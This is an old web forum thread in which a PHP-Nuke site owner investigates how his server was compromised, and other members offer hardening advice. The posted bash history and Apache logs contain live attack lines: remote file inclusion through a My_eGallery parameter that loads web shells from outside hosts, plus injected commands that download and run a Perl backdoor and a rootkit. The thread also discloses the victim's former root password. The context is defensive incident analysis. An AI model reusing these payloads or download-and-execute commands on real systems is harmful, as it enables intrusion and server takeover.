Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
marcelolaia
Hangin' Around


Joined: Sep 28, 2005
Posts: 36
Location: Brazil

PostPosted: Thu Jun 01, 2006 5:20 am Reply with quote

Hi,

My home server was hacked and I cant found the way used for hack it.

I inspect the root's .bash_history and found this ones:

Quote:
id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget Only registered users can see links on this board! Get registered or login!
lynx -source Only registered users can see links on this board! Get registered or login! >
psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget Only registered users can see links on this board! Get registered or login!
lynx -source Only registered users can see links on this board! Get registered or login! > psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget Only registered users can see links on this board! Get registered or login!
lynx -source Only registered users can see links on this board! Get registered or login! >
psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source Only registered users can see links on this board! Get registered or login! >
psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source Only registered users can see links on this board! Get registered or login! > psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin


Any one could help me to find the vulnerability???

I use phpnuke 7.4 and my server is a debian stable.

I have the log files in the /var/log and i see that the file psyBNC2.3.2-4.tar.gz was created in may, 1.

Thank you

_________________
Marcelo Only registered users can see links on this board! Get registered or login!
O site do Pós-Graduando
Concurso, Notícias, CAPES, CNPq, FAPESP, Mestrado, Doutorado, Professor, Público, Universidade, Faculdade 
View user's profile Send private message Visit poster's website
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Thu Jun 01, 2006 6:21 am Reply with quote

Sounds like a needle in a very large haystack...

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9456
Location: Arizona

PostPosted: Thu Jun 01, 2006 7:14 am Reply with quote

Doubtful this was hacked because of PHP-Nuke unless you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user level access to the server (or was it root access?).

If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected up directly), then you may want to disable remote user login. Don't know how to do that, but I know it is possible in most *nix environments.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
VinDSL
Life Cycles Becoming CPU Cycles


Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

PostPosted: Fri Jun 02, 2006 12:45 am Reply with quote

montego wrote:
Doubtful this was hacked because of PHP-Nuke...
Gotta agree!

I have servers, here at the house -- Slackware boxes -- but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mister-T used to say...

Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above... Wink

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: Only registered users can see links on this board! Get registered or login! | Only registered users can see links on this board! Get registered or login! ::. 
View user's profile Send private message Visit poster's website ICQ Number
VinDSL
PostPosted: Fri Jun 02, 2006 12:47 am Reply with quote

Um... BTW, if it was me, I'd disable wget and lynx!!! That's just asking for trouble...
 
VinDSL
PostPosted: Fri Jun 02, 2006 12:58 am Reply with quote

LoL! This gets more interesting, the more I look at it!

As I hinted at above, 'they' used wget and lynx to upload the root kit[s] to your site... Then, away they went...

Make sure your server is recognizing the MIMEs mentioned above, such as:

Code:
AddType application/x-tar .tar

AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz


...and so forth, and so on!

Also, while you're at it, you might as well take care of RAR, since a LOT of 'script kiddies' are taking advantage of this vuln right now.

This applies to ALL Nuke web sites:

Code:
AddType application/x-rar-compressed .rar


This has snuck under the radar at MANY mass web hosts... mostly 'cause they all use the same canned software, like cPanel/WHM Rolling Eyes
 
VinDSL
PostPosted: Fri Jun 02, 2006 1:24 am Reply with quote

Heh! One more post and I'll stop spamming...

Some of you might find this interesting! I posted it the other day on another web site...

==============================

To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...

Create a plain text file containing the following code:

Code:
<?php print 'Oops!  If you can read this, your web server is vulnerable to attack!'; ?>

Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.

Then, run it in your browser by entering the URL in the browser's addy bar, i.e. Only registered users can see links on this board! Get registered or login!

If the page shows the message:

Quote:
Oops! If you can read this, your web server is vulnerable to attack!

...you should be alarmed!

If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...

==============================
 
marcelolaia
PostPosted: Fri Jun 02, 2006 5:34 am Reply with quote

Dear kguske, montego, VinDSL,

kguske: yes, this is a needle in a very large haystack, for me! Smile

montego:
Quote:
you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server

yes! I have a general user in my server with the same username and pass that I was using in Nuke.

Quote:
This guy somehow got your root password?

Yes, the guy got my root password. My root pass was a very um commom pass. It was: DP83905AVQB . I suppose that he did a reverse conexion with a irq script and gain access to a apache shell script and do the comand "passwd" and change the root passwd. For me, he dont discovered my root passwd.

Quote:
If you do not have to access your server remotely (...), then you may want to disable remote user login

Yes, I have a keyboard and monitor and mouse connected. But, my server was in another place, then I need to connect to it by SSH. But, how I write above, I suppose that the guy did a reverse connection!!!! This is the problem: how I block reverse conection and how I block access to apche shell???

VinDSL
Quote:
I'd disable wget and lynx!!!

Yes, I will deinstall this two applications.

Quote:
Then, away they went...

Yes, I am sure that he went!

Quote:
Make sure your server is recognizing the MIMEs mentioned above, such as:
Code:
AddType application/x-tar .tar

AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz

(...)
This applies to ALL Nuke web sites:
Code:
AddType application/x-rar-compressed .rar


I am sorry, but what you are suggesting me?? Where I find/modify here? In http.conf? I am sorry, but my english is very poor!!!

I am very interested, to prevent and to learn, how the guy gain access to my shell???

I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not... Wink

Thank you very much
 
montego
PostPosted: Fri Jun 02, 2006 6:22 am Reply with quote

Quote:

I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not...


The only way to confirm this, I think, is through your Apache logs.

I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I.
 
marcelolaia
PostPosted: Thu Jun 08, 2006 12:53 pm Reply with quote

Hi Friends,

I found out what the kiddies did on my site:

here is the way:
Quote:
85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home HTTP/1.1" 200 221 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up HTTP/1.1" 200 211 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search HTTP/1.1" 200 262 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F& HTTP/1.1" 200 3152 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2152 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2032 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2081 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2073 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2035 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2076 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 1966 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2249 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2322 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2282 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2703 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2117 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2109 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f*** HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"


The script that he had used is here: Only registered users can see links on this board! Get registered or login!

Now, what I do to prevent a new attack???

Could you help me?

I wolud like to continue using a gallery. Menalto is the option?

Thank you very much
 
Tao_Man
Involved
Involved


Joined: Jul 15, 2004
Posts: 252
Location: OKC, OK

PostPosted: Thu Jun 08, 2006 3:16 pm Reply with quote

I tried you test of vindsl.php.rar and sad to say it failed. So I added the mime types in my .htaccess file but it did not do anything. I checked on the apache site and could not find anything else to do, is there some trick?

I guess they may not have the mod_mine turned on.

_________________
------------------------------------------
To strive, to seek, to find, but not to yield!
I don't know Kara-te but I do know cra-zy, and I WILL use it! 
View user's profile Send private message Visit poster's website
kenwood
Worker
Worker


Joined: May 18, 2005
Posts: 119
Location: SVCDPlaza

PostPosted: Fri Jun 09, 2006 4:08 am Reply with quote

On suse you can put the mime_magic module @ the APACHE_MODULES in the file:/etc/sysconfig/apache2 .
The MIME type goes in the file:/etc/mime.types file
Reboot apache and it will work .
 
View user's profile Send private message Visit poster's website
montego
PostPosted: Fri Jun 09, 2006 6:24 am Reply with quote

marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:

Code:


if ( !defined('MODULE_FILE') )
{
   die("You can't access this file directly...");
}


This would prevent these direct access attempts, however, I am not 100% if this would cause issues with the operations of the tool. It they wrote it to work within the nuke "structure", meaning, everything comes in through modules.php or admin.php.

Another possible "killer" to this if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, then you could even place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.

Unfortunately, although nuke has had many wholes which have needed patching over the years, it is only as weak as its weakest link, and if you throw in a module that has "wholes" then immediately, your whole nuke site is vulnerable.

I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure!
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©